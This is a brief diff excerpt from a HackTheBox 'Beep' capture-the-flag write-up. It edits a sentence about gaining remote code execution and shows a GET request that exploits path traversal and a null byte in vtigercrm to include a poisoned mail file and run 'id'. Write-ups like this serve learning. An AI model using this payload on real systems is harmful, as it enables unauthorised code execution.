babbadeckl/HackTheBox-Writeups/Beep/README.md

 To: undisclosed-recipients:;
 ```

-Now when we append our RCE parameter `babbadeckl`, we have RCE:
+Now when we append our malicious parameter `babbadeckl`, that we included in the injected PHP code, we have RCE:

 ```
 GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=id